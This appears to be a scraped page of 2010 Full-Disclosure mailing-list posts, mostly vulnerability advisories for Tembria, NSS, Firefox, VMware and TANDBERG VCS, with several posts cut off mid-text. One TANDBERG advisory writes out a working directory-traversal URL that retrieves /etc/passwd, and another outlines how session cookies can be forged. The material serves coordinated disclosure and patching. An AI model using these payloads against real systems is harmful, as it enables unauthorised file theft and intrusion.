http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability in Tembria Server Monitor
Hi, Please find the advisory in attachment. Regards, Sébastien Duquette Corelan TeamAdvisory CORELAN-10-022 Reference : CVE-2010-1316 Disclosure date : April 8th, 2010 http://www.corelan.be:8800/advisories.php?id=CORELAN-10-022 00 : Vulnerability information Product : Tembria Server Monitor Version : 5.6.0 Vendor : Don Leclair / tembria.com URL : http://www.tembria.com/download/ Platform : Windows Type of vulnerability : Stack overflow Risk rating : Medium Issue fixed in version : 5.6.1 (released april 8) Vulnerability discovered by : Lincoln Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/ 01 : Vendor description of software From the vendor website: "Tembria Server Monitor continuously monitors your network for potential problems so you don't have to. Supporting popular Internet protocols, Tembria Server Monitor watches for specific conditions and notifies you if a problem is detected." 02 : Vulnerability details The HTTP service is vulnerable to a buffer overflow, allowing a malicious person to trigger a remote Denial Of Service condition by sending a specially crafted GET,PUT, or HEAD request to the Server.The application service then immediately stops and requires the user to restart the service. Remote code execution may be possible. No user intervention is required to trigger the overflow/DoS. Corelan would like to mention that the software vendor was very cooperative and proactive with communication and addressing the issue in a timely manner. 03 : Author/Vendor communication March 31 2010 : author contacted March 31 2010 : author replies, ask for proof of concept March 31 2010 : Corelan sends proof of concept April 5 2010 : Corlean ask for update April 5 2010 : author replies back with patched software April 5 2010 : Corelan verifies issue fixed in new version April 8 2010 : fixed version released April 9 2010 : public disclosure 04: PoC Proof of concept is available at the following URL : http://www.corelan.be:8800/wp-content/forum-file-uploads/admin1/exploits/corelan_lincoln_tembria.py_.txt___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-927-1] NSS vulnerability
=== Ubuntu Security Notice USN-927-1 April 09, 2010 nss vulnerability CVE-2009-3555 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: libnss3-1d 3.12.6-0ubuntu0.9.10.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user's session. This update adds support for the new new renegotiation extension and will use it when the server supports it. Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.1.diff.gz Size/MD5:36589 0b0b4b8d1dd122093fa815d69efbc89e http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6-0ubuntu0.9.10.1.dsc Size/MD5: 1651 a0117f537999a8c5a29dac921fe3db19 http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.6.orig.tar.gz Size/MD5: 5947630 da42596665f226de5eb3ecfc1ec57cd1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 3235746 038ea8c22fc1adcec7c6eb94a2666e7f http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 1234192 6ce9b85ed07528c77d924d8949c85774 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 263144 cb7c75294d9ce22ed463935759f8546a http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5:17752 041cb0b8d9ef5e7dbb4a7b6b21c68fed http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_amd64.deb Size/MD5: 313120 9305a9fbe4473a5fbcb129052d3a9d5e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 3178260 f86edf83bfa1a693add3f9f9a5fce87d http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 1119650 7ea6f3113550c23ff2d786e8bb6826a9 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 260452 2be494403893cce2523e56003450381f http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5:17758 84b68d14e2edafa15c4d85251a234509 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_i386.deb Size/MD5: 299734 78c46aca04aae9369ba47dbbbd7b4ebb lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 3216586 542551cab0ad5b7d02469995f0138483 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 1095640 673d9d626476508b78b1c01ec14da360 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 259386 22bac19ca5b1faee3374cfa4d71ee0f6 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5:17754 cf0945e1ee85107157e820fa4f1ee5c6 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_lpia.deb Size/MD5: 298426 25cb3017432736f8fe127efc2cef8235 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 3325392 71aa8238fa81e9eda6405450e9a15389 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 1206786 5b3f8a2c91c7c8a58055f2bdf3b47ee3 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 261718 e0f60fafda404bbcd749a1279bdd2601 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5:17758 ce3c85e4e6e53fff45bcbec8fac99ede http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.1_powerpc.deb Size/MD5: 310922 acc562396e43692d342d0c44fe7e9131 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.1_sparc.deb Size/MD5: 2967738 84df47285cec6cdb1
[Full-disclosure] [USN-921-1] Firefox 3.5 and Xulrunner vulnerabilities
=== Ubuntu Security Notice USN-921-1 April 09, 2010 firefox-3.5, xulrunner-1.9.1 vulnerabilities CVE-2010-0173, CVE-2010-0174, CVE-2010-0175, CVE-2010-0176, CVE-2010-0177, CVE-2010-0178, CVE-2010-0179, CVE-2010-0181, CVE-2010-0182 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: firefox-3.5 3.5.9+nobinonly-0ubuntu0.9.10.1 xulrunner-1.9.1 1.9.1.9+nobinonly-0ubuntu0.9.10.1 After a standard system upgrade you need to restart Firefox and any applications that use Xulrunner to effect the necessary changes. Details follow: Martijn Wargers, Josh Soref, Jesse Ruderman, and Ehsan Akhgari discovered flaws in the browser engine of Firefox. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0173, CVE-2010-0174) It was discovered that Firefox could be made to access previously freed memory. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0175, CVE-2010-0176, CVE-2010-0177) Paul Stone discovered that Firefox could be made to change a mouse click into a drag and drop event. If the user could be tricked into performing this action twice on a crafted website, an attacker could execute arbitrary JavaScript with chrome privileges. (CVE-2010-0178) It was discovered that the XMLHttpRequestSpy module as used by the Firebug add-on could be used to escalate privileges within the browser. If the user had the Firebug add-on installed and were tricked into viewing a malicious website, an attacker could potentially run arbitrary JavaScript. (CVE-2010-0179) Henry Sudhof discovered that an image tag could be used as a redirect to a mailto: URL to launch an external mail handler. (CVE-2010-0181) Wladimir Palant discovered that Firefox did not always perform security checks on XML content. An attacker could exploit this to bypass security policies to load certain resources. (CVE-2010-0182) Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly-0ubuntu0.9.10.1.diff.gz Size/MD5: 129770 0665849c341bbaeb43dc853328434d74 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly-0ubuntu0.9.10.1.dsc Size/MD5: 2595 b31a13643a6699a0669164e5c812e874 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.5.9+nobinonly.orig.tar.gz Size/MD5: 45825322 bdb27480034e67db569e8b0f4fe180be http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly-0ubuntu0.9.10.1.diff.gz Size/MD5:59497 700cd2dc3672792e073fa5dd2451a927 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly-0ubuntu0.9.10.1.dsc Size/MD5: 2565 d6ac2e0d72309c2979a33e4e71c14971 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.1/xulrunner-1.9.1_1.9.1.9+nobinonly.orig.tar.gz Size/MD5: 45124822 f3daad932b9fbf4b2fc33798e4c21e55 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73568 0f56708e218445e068269a9e1a9a6af6 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.0-dev_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73422 567aa3f3c16b4564739c4bd77e446d93 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dbg_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73416 f401b03d7e3c7ba1d3dcd1fe591adef1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dev_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73416 eb00ecbb00c027b5f37fcb0e19f4909e http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73478 126936486b1bea1d490d6cc36b96acca http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73576 7212547851f9d203016dce0d233e8885 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0-branding_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/MD5:73438 09052f4029acfb37574096c2b8f8e325 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0_3.5.9+nobinonly-0ubuntu0.9.10.1_all.deb Size/
[Full-disclosure] iDefense Security Advisory 04.09.10: VMware VMnc Codec Heap Overflow Vulnerability
iDefense Security Advisory 04.09.10 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 09, 2010 I. BACKGROUND VMware Inc. markets several virtualization products such as ACE, Player, Server, and Workstation. These products include a video coder-decoder (codec) called 'vmnc.dll', or VMware Movie Decoder, that is registered on the host machine at installation time. This codec will be used whenever video streams of the 'VMnc' type, such as those produced when using VMware Workstation's "Capture Movie" feature, are encountered. For more information, refer to the links shown below. http://en.wikipedia.org/wiki/Codec http://www.vmware.com/support/ws5/doc/ws_running_capture.html II. DESCRIPTION Remote exploitation of a heap-based buffer overflow vulnerability in VMware Inc.'s movie decoder allows attackers to execute arbitrary code. This vulnerability exists due to a lack of input validation when processing certain specially crafted Audio-Video Interleave (AVI) files. During processing, a heap buffer will be allocated based on one part of the AVI file data. However, the amount of data copied into that buffer is calculated based on a different part of the file. This leads to an exploitable heap-based buffer overflow condition. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user running an application utilizing the vulnerable codec. In order to reach the vulnerable code, a targeted user must play a specially crafted AVI media file. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. IV. DETECTION iDefense confirmed the existence of this vulnerability using the following software. vmnc.dll version 6.5.2.7026 from Workstation 6.5.2 vmnc.dll version 6.5.3. from Workstation 6.5.3 A full list of affected VMware products can be found in Security Advisory VMSA-2010-0007. V. WORKAROUND Disabling the 'VMnc' codec will prevent exploitation. In order to do so, import the 'disable-vmnc-codec.reg' registry file as follows. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32] "VIDC.VMnc"=- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32] "VIDC.VMnc"=- VI. VENDOR RESPONSE VMware Inc. has released patches to address this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://lists.vmware.com/pipermail/security-announce/2010/90.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-1564 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/25/2009 Initial Vendor Notification 08/25/2009 Initial Vendor Reply 04/09/2010 Coordinated Public Disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-920-1] Firefox 3.0 and Xulrunner vulnerabilities
=== Ubuntu Security Notice USN-920-1 April 09, 2010 firefox-3.0, xulrunner-1.9 vulnerabilities CVE-2010-0174, CVE-2010-0175, CVE-2010-0176, CVE-2010-0177, CVE-2010-0178, CVE-2010-0179 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: firefox-3.0 3.0.19+nobinonly-0ubuntu0.8.04.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.8.04.1 Ubuntu 8.10: abrowser3.0.19+nobinonly-0ubuntu0.8.10.1 firefox-3.0 3.0.19+nobinonly-0ubuntu0.8.10.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.8.10.1 Ubuntu 9.04: abrowser3.0.19+nobinonly-0ubuntu0.9.04.1 firefox-3.0 3.0.19+nobinonly-0ubuntu0.9.04.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.9.04.1 After a standard system upgrade you need to restart Firefox and any applications that use Xulrunner to effect the necessary changes. Details follow: Martijn Wargers, Josh Soref, Jesse Ruderman, and Ehsan Akhgari discovered flaws in the browser engine of Firefox. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0174) It was discovered that Firefox could be made to access previously freed memory. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0175, CVE-2010-0176, CVE-2010-0177) Paul Stone discovered that Firefox could be made to change a mouse click into a drag and drop event. If the user could be tricked into performing this action twice on a crafted website, an attacker could execute arbitrary JavaScript with chrome privileges. (CVE-2010-0178) It was discovered that the XMLHttpRequestSpy module as used by the Firebug add-on could be used to escalate privileges within the browser. If the user had the Firebug add-on installed and were tricked into viewing a malicious website, an attacker could potentially run arbitrary JavaScript. (CVE-2010-0179) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 106784 17f50b50fa9740c6fcf82c1feb3cd2de http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2387 33644ec48d3ef7a34135f12bfc6d30ef http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly.orig.tar.gz Size/MD5: 11605275 b1e129a58d29379376f04be1959b8268 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5:79855 2ce4812dc10be1191daa98476f468cb1 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2438 4f71c33a06184499d8ff99b1efb78d66 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly.orig.tar.gz Size/MD5: 42005942 92a0017fe802a917e67dbf5d05216d6f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66558 f8afcac074ad9969983db51e54f61c16 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66568 378667968d1ed3f4345ba25a854930d4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66534 145cc5ce4f031f08fb8515cce1ad9a05 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66520 e681baa33f03eb2e8cf35b542cb36a09 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66676 04ee6cea1699facb138145aed452c8c9 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66578 574947764c813c2ce224ac3a85b2663f http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66526 56d1455d499d3088331019dd795f68dd http://security.ubuntu.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
On Wed, Apr 07, 2010 at 03:52:00PM -0600, Digital X spake thusly: > Having just gone through a PCI audit I can safely say a few things: Not the fault of PCI. Perhaps you should consider a better auditor. -- Tracy Reed http://tracyreed.org pgp0MpTXa0ifv.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2009-4510: TANDBERG VCS Static SSH Host Keys
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Static SSH Host Keys Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.3.0, x4.2.1, and possibly earlier Severity: High Discovered by: Jon Hart Advisory by: Timothy D. Morgan Vendor Status: Firmware version x5.1.1 released [2]. CVE Candidate: CVE-2009-4510 Reference: http://www.vsecurity.com/resources/advisory/20100409-2/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: "The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks." Vulnerability Overview - -- On December 2nd, VSR identified a SSH service authentication weakness vulnerability in the TANDBERG's Video Communication Server. This issue would allow an attacker with privileged network access to conduct server impersonation and man-in-the-middle attacks on administrator SSH sessions. Successful attacks could yield shell access to vulnerable appliances. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides several system shell accounts accessible via the SSH protocol. Vulnerability Details - - The TANDBERG VCS appliance is deployed by default with a DSA ssh key pair stored in files: /tandberg/sshkeys/ssh_host_dsa_key /tandberg/sshkeys/ssh_host_dsa_key.pub In tested versions of the firmware, this default key has a fingerprint of: 49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8 No new key is generated upon installation. In addition, this default key would overwrite any SSH server keys, if installed by security-conscious administrators previously, during a firmware upgrade. Due to the public nature of this key (see firmware downloads [2]) an attacker would be able to conduct server impersonation and man-in-the-middle attacks on SSH connections directed at any TANDBERG VCS device. A successful exploit would most likely yield an attacker shell access to the device with privileges of the victim client. Versions Affected - - VSR has observed this vulnerability in version x4.2.1. Based on preliminary analysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also appear to be vulnerable. Earlier versions have not been tested. Vendor Response - --- The following timeline details TANDBERG's response to the reported issue: 2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately. 2009-12-22VSR provided TANDBERG a draft advisory. 2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware, but this did not appear to correct the issue. 2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware, but this did not appear to correct the issue for existing installations, since old vulnerable keys would be preserved. 2010-01-28TANDBERG explained that changing SSH keys automatically on administrators may cause backward compatibility problems. Therefore, TANDBERG decided to preserve old keys even when upgrading a system which contains a vulnerable key. Administrators will instead be warned in the web console that a vulnerable key is in use and will be expected to update host keys manually. 2010-03-26TANDBERG provided VSR with a release candidate firmware for version x5.1.1. 2010-04-07TANDBERG VCS firmware version x5.1.1 released [2]. 2010-04-09VSR advisory released. Recommendation - -- Immediately replace the current SSH host key with a new one. This may be accomplished through one of several methods. One approach is to simply log in to the device locally and use the ssh-keygen utility to replace the keys stored in /tandberg/sshkeys/. Consult TANDBERG documentation for other methods. After replacing the SSH host keys, it is recommended that the VCS firmware be upgraded to X5.1.1 as soon as possible. NOTE: Upgrading or downgrading to versions prior to X5.1.1 will cause any custom SSH host keys to be overwritten. Version X5.1.1 and later should preserve any custom host keys previously installed. As a precaution, after upgradin
[Full-disclosure] CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.3.0, x4.2.1, and possibly earlier Severity: Medium Discovered by: Jon Hart Advisory by: Timothy D. Morgan Vendor Status: Firmware update released [2] CVE Candidate: CVE-2009-4511 Reference: http://www.vsecurity.com/resources/advisory/20100409-3/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: "The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks." Vulnerability Overview - -- On December 3rd, VSR identified a directory traversal and file retrieval vulnerability in the TANDBERG's Video Communication Server. This issue would allow an authenticated attacker (who has access as an administrator or less privileged user on the web administration interface) to retrieve files from the filesystem which are readable by the "nobody" system user. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides a web-based management interface implemented in PHP which allows administrators to perform a wide variety of actions, including configuration of the device, management of user accounts, firmware updates, along with number of other items. Vulnerability Details - - The TANDBERG VCS web management interface provides two nearly identical scripts at URLs: https://vulnerable.example.com/helppage.php https://vulnerable.example.com/user/helppage.php These help pages accept a "file" parameter in the URL which can be used to retrieve nearly arbitrary files from the filesystem. The relevant source code for these pages is as follows: // The following is Copyright (C) 2009 TANDBERG // ... // Grab the content before we write anything: we'll need it for the title tag in the // Dig out the page title, from the tag, // then remove any surround in the page as we add our own... $filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix; if (! file_exists($filename)) { $helpHTML = "There is no help available for the ". $_GET['page'] . " page"; $pageTitle = $_GET['page']; }else{ $helpHTML = file_get_contents($filename); ... echo "\n\n"; echo $helpHTML; echo "\n"; ... // end of excerpt // Here, the final path string ($filename) loaded and displayed to the user is prepended with a directory and appended with a file extension. Using simple directory traversal techniques ("../") it is possible to traverse to any directory on the filesystem. Using a trailing NUL byte encoded in the URL (%00) it is also possible to truncate the file path to eliminate the file extension. For instance, the following URL retrieves the /etc/passwd file: https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00 During testing, it was found that the x4.2.1 firmware runs the web server as the "nobody" user, which somewhat limits the amount of sensitive information that may be obtained. However, since shadowed passwords were not configured, it was possible to retrieve all local system users' password hashes from /etc/passwd. Additional password hashes are available in /tandberg/persistent/etc/digest. Versions Affected - - VSR has successfully exploited this issue in firmware version x4.2.1. Based on preliminary source code analysis[2], versions x4.3.0 and x5.0 also appear to be vulnerable. Earlier versions have not been tested. Vendor Response - --- The following timeline details TANDBERG's response to the reported issue: 2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately. 2009-12-22VSR provided TANDBERG a draft advisory. 2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware, but this did not appear to correct the issue (based on PHP code analysis alone). 2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware for testing which appeared to correct the vulnerability. 2010-03-26TANDBERG provided VSR
[Full-disclosure] CVE-2009-4509: TANDBERG VCS Authentication Bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Authentication Bypass Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.2.1 and possibly earlier Severity: Critical Discovered by: Jon Hart and Timothy D. Morgan Advisory by: Timothy D. Morgan Vendor Status: Update released (without security advisory) on October 9, 2009 CVE Candidate: CVE-2009-4509 Reference: http://www.vsecurity.com/resources/advisory/20100409-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: "The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks." Vulnerability Overview - -- On December 2nd, VSR identified an authentication bypass vulnerability in TANDBERG's Video Communication Server, firmware version x4.2.1. This vulnerability allows for the complete bypass of authentication in the administrative web console. Since this web interface can be used to execute arbitrary code on the appliance as root (via software updates), the severity is considered critical. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides a web-based management interface implemented in PHP which allows administrators to perform a wide variety of actions, including configuration of the device, management of user accounts, firmware updates, along with number of other items. Vulnerability Details - - The TANDBERG VCS web management interface utilizes custom cookies for the purpose of session management. In version x4.2.1 of the appliance firmware (and possibly earlier versions), it is possible to forge session cookies with relatively little knowledge of the appliance's configuration. The vulnerability lies in the files located at the following paths: /tandberg/web/lib/secure.php /tandberg/web/user/lib/secure.php Routines in these files generate user session cookies in roughly the following way: SECRET = SERVER_ADDRESS + STATIC_VALUE HASH = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME) COOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH In the above pseudocode, the SERVER_ADDRESS represents the VCS system's 